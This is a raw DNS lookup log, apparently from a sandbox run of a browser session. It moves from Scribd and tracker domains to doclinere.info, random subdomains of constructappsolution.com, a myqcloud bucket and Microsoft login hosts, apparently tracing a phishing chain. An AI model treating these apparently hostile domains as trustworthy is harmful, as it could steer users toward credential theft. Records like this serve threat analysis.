                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.555252075 CET192.168.2.161.1.1.10x7c7bStandard query (0)www.redditstatic.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.560116053 CET192.168.2.161.1.1.10x7731Standard query (0)pixel-config.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.560267925 CET192.168.2.161.1.1.10x84c0Standard query (0)pixel-config.reddit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.876741886 CET192.168.2.161.1.1.10xa014Standard query (0)cdn.pdst.fmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.876879930 CET192.168.2.161.1.1.10x74d6Standard query (0)cdn.pdst.fm65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.882468939 CET192.168.2.161.1.1.10xa050Standard query (0)pixels.spotify.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.882628918 CET192.168.2.161.1.1.10x2753Standard query (0)pixels.spotify.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.951014042 CET192.168.2.161.1.1.10x666aStandard query (0)analytics.tiktok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:34.951215029 CET192.168.2.161.1.1.10x9d22Standard query (0)analytics.tiktok.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.016227007 CET192.168.2.161.1.1.10xc303Standard query (0)utt.impactcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.016486883 CET192.168.2.161.1.1.10xf90cStandard query (0)utt.impactcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.659193993 CET192.168.2.161.1.1.10x973fStandard query (0)browser.sentry-cdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.659455061 CET192.168.2.161.1.1.10xc469Standard query (0)browser.sentry-cdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.779119015 CET192.168.2.161.1.1.10x3ef4Standard query (0)cdn.optimizely.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.779288054 CET192.168.2.161.1.1.10x5b70Standard query (0)cdn.optimizely.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.934597015 CET192.168.2.161.1.1.10x4ca7Standard query (0)m.stripe.networkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:35.934739113 CET192.168.2.161.1.1.10xf8ecStandard query (0)m.stripe.network65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.446698904 CET192.168.2.161.1.1.10xd493Standard query (0)m.stripe.networkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.446698904 CET192.168.2.161.1.1.10x3076Standard query (0)m.stripe.network65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.576922894 CET192.168.2.161.1.1.10x3f27Standard query (0)cdn.siftscience.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.577074051 CET192.168.2.161.1.1.10x5d23Standard query (0)cdn.siftscience.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.577812910 CET192.168.2.161.1.1.10xa87Standard query (0)sp.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.578020096 CET192.168.2.161.1.1.10x2984Standard query (0)sp.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.578393936 CET192.168.2.161.1.1.10x427bStandard query (0)t.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.578694105 CET192.168.2.161.1.1.10x3073Standard query (0)t.co65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.579111099 CET192.168.2.161.1.1.10xee8eStandard query (0)pixel-config.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.579256058 CET192.168.2.161.1.1.10x64f4Standard query (0)pixel-config.reddit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.701900005 CET192.168.2.161.1.1.10x4f69Standard query (0)analytics.twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.702053070 CET192.168.2.161.1.1.10x6da5Standard query (0)analytics.twitter.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.746642113 CET192.168.2.161.1.1.10xaf0eStandard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:36.746917963 CET192.168.2.161.1.1.10xa1acStandard query (0)google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.492165089 CET192.168.2.161.1.1.10xff4eStandard query (0)t.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.492418051 CET192.168.2.161.1.1.10x5fe3Standard query (0)t.co65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.709059000 CET192.168.2.161.1.1.10x434bStandard query (0)analytics.twitter.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.709203005 CET192.168.2.161.1.1.10xd203Standard query (0)analytics.twitter.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.714531898 CET192.168.2.161.1.1.10x4dc6Standard query (0)sp.analytics.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.714679003 CET192.168.2.161.1.1.10x32a1Standard query (0)sp.analytics.yahoo.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.764141083 CET192.168.2.161.1.1.10x385cStandard query (0)pixels.spotify.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.764281034 CET192.168.2.161.1.1.10xd4a5Standard query (0)pixels.spotify.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.956819057 CET192.168.2.161.1.1.10x7c2eStandard query (0)cdn.siftscience.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:38.956960917 CET192.168.2.161.1.1.10xd4fStandard query (0)cdn.siftscience.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:39.780472994 CET192.168.2.161.1.1.10xe93bStandard query (0)alb.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:39.780654907 CET192.168.2.161.1.1.10xd95eStandard query (0)alb.reddit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:41.634416103 CET192.168.2.161.1.1.10x831aStandard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:41.634537935 CET192.168.2.161.1.1.10xe522Standard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:41.635261059 CET192.168.2.161.1.1.10xd9b5Standard query (0)alb.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:41.635396957 CET192.168.2.161.1.1.10xdb68Standard query (0)alb.reddit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:41.774755001 CET192.168.2.161.1.1.10xcfbaStandard query (0)sentry.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:41.774898052 CET192.168.2.161.1.1.10x7ddaStandard query (0)sentry.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:41.855570078 CET192.168.2.161.1.1.10xcf6cStandard query (0)m.stripe.networkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:41.855707884 CET192.168.2.161.1.1.10xe0bdStandard query (0)m.stripe.network65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:42.360557079 CET192.168.2.161.1.1.10x5ab8Standard query (0)m.stripe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:42.360690117 CET192.168.2.161.1.1.10x72eeStandard query (0)m.stripe.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:42.473309040 CET192.168.2.161.1.1.10xc4e7Standard query (0)doclinere.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:42.473490000 CET192.168.2.161.1.1.10x9e29Standard query (0)doclinere.info65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:43.668142080 CET192.168.2.161.1.1.10xabb6Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:43.668405056 CET192.168.2.161.1.1.10x8257Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:43.670728922 CET192.168.2.161.1.1.10xc39bStandard query (0)stats.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:43.670938969 CET192.168.2.161.1.1.10x6923Standard query (0)stats.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:43.671875954 CET192.168.2.161.1.1.10x63fbStandard query (0)hexagon-analytics.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:43.672112942 CET192.168.2.161.1.1.10xe75fStandard query (0)hexagon-analytics.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:43.674158096 CET192.168.2.161.1.1.10x38bbStandard query (0)sentry.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:43.674297094 CET192.168.2.161.1.1.10xc491Standard query (0)sentry.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:44.511585951 CET192.168.2.161.1.1.10x6111Standard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:44.511768103 CET192.168.2.161.1.1.10x5c1fStandard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:44.910275936 CET192.168.2.161.1.1.10xd3b8Standard query (0)m.stripe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:44.910433054 CET192.168.2.161.1.1.10xcbccStandard query (0)m.stripe.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:45.559036016 CET192.168.2.161.1.1.10x4fd4Standard query (0)hexagon-analytics.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:45.559205055 CET192.168.2.161.1.1.10x66fbStandard query (0)hexagon-analytics.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:47.354944944 CET192.168.2.161.1.1.10xb2c1Standard query (0)stripe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:47.355212927 CET192.168.2.161.1.1.10x96b2Standard query (0)stripe.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:48.698411942 CET192.168.2.161.1.1.10xf1fdStandard query (0)tattle.api.osano.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:48.698582888 CET192.168.2.161.1.1.10x66e0Standard query (0)tattle.api.osano.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:50.236337900 CET192.168.2.161.1.1.10x606Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:50.236478090 CET192.168.2.161.1.1.10x5ec5Standard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:50.682009935 CET192.168.2.161.1.1.10x781bStandard query (0)pub-28cbd5bc68cb4c26b93f263849a029cc.r2.devA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:50.682173014 CET192.168.2.161.1.1.10x7ba8Standard query (0)pub-28cbd5bc68cb4c26b93f263849a029cc.r2.dev65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:52.308046103 CET192.168.2.161.1.1.10xd623Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:52.308183908 CET192.168.2.161.1.1.10xf2f0Standard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:53.052681923 CET192.168.2.161.1.1.10x71acStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:53.053040028 CET192.168.2.161.1.1.10x14fcStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:54.749347925 CET192.168.2.161.1.1.10xdb4bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:54.749522924 CET192.168.2.161.1.1.10xa7edStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:55.281141996 CET192.168.2.161.1.1.10xef67Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:55.281322956 CET192.168.2.161.1.1.10x3435Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:55.403443098 CET192.168.2.161.1.1.10xcf38Standard query (0)rphfymzrfvbgvnwbxgqz.constructappsolution.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:55.403594017 CET192.168.2.161.1.1.10x57d7Standard query (0)rphfymzrfvbgvnwbxgqz.constructappsolution.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.100881100 CET192.168.2.161.1.1.10x4aa3Standard query (0)rphfymzrfvbgvnwbxgqz.constructappsolution.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.100881100 CET192.168.2.161.1.1.10x622eStandard query (0)rphfymzrfvbgvnwbxgqz.constructappsolution.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.192138910 CET192.168.2.161.1.1.10x34baStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.192466974 CET192.168.2.161.1.1.10xb571Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.193361998 CET192.168.2.161.1.1.10xe586Standard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.193571091 CET192.168.2.161.1.1.10xba2dStandard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.195261955 CET192.168.2.161.1.1.10xe30bStandard query (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.195261955 CET192.168.2.161.1.1.10x25b2Standard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.195713043 CET192.168.2.161.1.1.10xb70eStandard query (0)drizzysamson-1323985617.cos.na-siliconvalley.myqcloud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:59.195935965 CET192.168.2.161.1.1.10xdea9Standard query (0)drizzysamson-1323985617.cos.na-siliconvalley.myqcloud.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:01.333302021 CET192.168.2.161.1.1.10xd6adStandard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:01.333468914 CET192.168.2.161.1.1.10x18f4Standard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:01.398756027 CET192.168.2.161.1.1.10xe0f9Standard query (0)stackpath.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:01.398940086 CET192.168.2.161.1.1.10xd98fStandard query (0)stackpath.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:01.416723967 CET192.168.2.161.1.1.10x5cdStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:01.416851044 CET192.168.2.161.1.1.10xc6cfStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:02.707859993 CET192.168.2.161.1.1.10xc775Standard query (0)office.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:02.707859993 CET192.168.2.161.1.1.10x3875Standard query (0)office.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:03.349693060 CET192.168.2.161.1.1.10x4f28Standard query (0)drizzysamson-1323985617.cos.na-siliconvalley.myqcloud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:03.349895954 CET192.168.2.161.1.1.10x217dStandard query (0)drizzysamson-1323985617.cos.na-siliconvalley.myqcloud.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:03.350630999 CET192.168.2.161.1.1.10xdc0aStandard query (0)drizzysamson.constructappsolution.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:03.350790977 CET192.168.2.161.1.1.10xbc50Standard query (0)drizzysamson.constructappsolution.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:04.845487118 CET192.168.2.161.1.1.10x6ddeStandard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:04.845689058 CET192.168.2.161.1.1.10xa836Standard query (0)www.office.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:07.113992929 CET192.168.2.161.1.1.10xe637Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:07.114156961 CET192.168.2.161.1.1.10x4e22Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:08.887597084 CET192.168.2.161.1.1.10x3a2cStandard query (0)drizzysamson.constructappsolution.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:08.887746096 CET192.168.2.161.1.1.10x2b6cStandard query (0)drizzysamson.constructappsolution.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:11.966451883 CET192.168.2.161.1.1.10x432fStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:11.966731071 CET192.168.2.161.1.1.10x115eStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:14.410183907 CET192.168.2.161.1.1.10x6695Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:14.410583973 CET192.168.2.161.1.1.10xdd5eStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:26.085100889 CET192.168.2.161.1.1.10xfb7eStandard query (0)wa.scribd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:26.085562944 CET192.168.2.161.1.1.10x1742Standard query (0)wa.scribd.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:29.713558912 CET192.168.2.161.1.1.10x6220Standard query (0)wa.scribd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:29.713558912 CET192.168.2.161.1.1.10x3ddbStandard query (0)wa.scribd.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:39.285574913 CET192.168.2.161.1.1.10x2b25Standard query (0)w3-reporting-nel.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:39.285711050 CET192.168.2.161.1.1.10x17ecStandard query (0)w3-reporting-nel.reddit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:39.286015034 CET192.168.2.161.1.1.10x5838Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 23:00:39.286133051 CET192.168.2.161.1.1.10x60aaStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:12.580185890 CET1.1.1.1192.168.2.160x224fNo error (0)www.scribd.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:12.580185890 CET1.1.1.1192.168.2.160x224fNo error (0)scribd.map.fastly.net151.101.194.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:12.580185890 CET1.1.1.1192.168.2.160x224fNo error (0)scribd.map.fastly.net151.101.130.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:12.580185890 CET1.1.1.1192.168.2.160x224fNo error (0)scribd.map.fastly.net151.101.66.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:12.580185890 CET1.1.1.1192.168.2.160x224fNo error (0)scribd.map.fastly.net151.101.2.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:12.581151009 CET1.1.1.1192.168.2.160xe2fbNo error (0)www.scribd.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.924575090 CET1.1.1.1192.168.2.160x4d98No error (0)cmp.osano.comd2gt2ux04o03l1.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.926846027 CET1.1.1.1192.168.2.160xea7No error (0)html.scribdassets.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.926846027 CET1.1.1.1192.168.2.160xea7No error (0)scribd.map.fastly.net151.101.2.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.926846027 CET1.1.1.1192.168.2.160xea7No error (0)scribd.map.fastly.net151.101.66.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.926846027 CET1.1.1.1192.168.2.160xea7No error (0)scribd.map.fastly.net151.101.130.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.926846027 CET1.1.1.1192.168.2.160xea7No error (0)scribd.map.fastly.net151.101.194.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.926863909 CET1.1.1.1192.168.2.160xeed7No error (0)s-f.scribdassets.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.926863909 CET1.1.1.1192.168.2.160xeed7No error (0)scribd.map.fastly.net151.101.2.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.926863909 CET1.1.1.1192.168.2.160xeed7No error (0)scribd.map.fastly.net151.101.66.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.926863909 CET1.1.1.1192.168.2.160xeed7No error (0)scribd.map.fastly.net151.101.130.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.926863909 CET1.1.1.1192.168.2.160xeed7No error (0)scribd.map.fastly.net151.101.194.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.927211046 CET1.1.1.1192.168.2.160x9ac8No error (0)html.scribdassets.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.927741051 CET1.1.1.1192.168.2.160x1728No error (0)s-f.scribdassets.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.951370955 CET1.1.1.1192.168.2.160xcf1aNo error (0)cmp.osano.comd2gt2ux04o03l1.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.951370955 CET1.1.1.1192.168.2.160xcf1aNo error (0)d2gt2ux04o03l1.cloudfront.net18.165.220.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.951370955 CET1.1.1.1192.168.2.160xcf1aNo error (0)d2gt2ux04o03l1.cloudfront.net18.165.220.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.951370955 CET1.1.1.1192.168.2.160xcf1aNo error (0)d2gt2ux04o03l1.cloudfront.net18.165.220.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:14.951370955 CET1.1.1.1192.168.2.160xcf1aNo error (0)d2gt2ux04o03l1.cloudfront.net18.165.220.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:15.276006937 CET1.1.1.1192.168.2.160x445eNo error (0)www.scribd.comscribd.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:15.276006937 CET1.1.1.1192.168.2.160x445eNo error (0)scribd.map.fastly.net151.101.2.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:15.276006937 CET1.1.1.1192.168.2.160x445eNo error (0)scribd.map.fastly.net151.101.66.152A (IP address)IN (0x0001)false
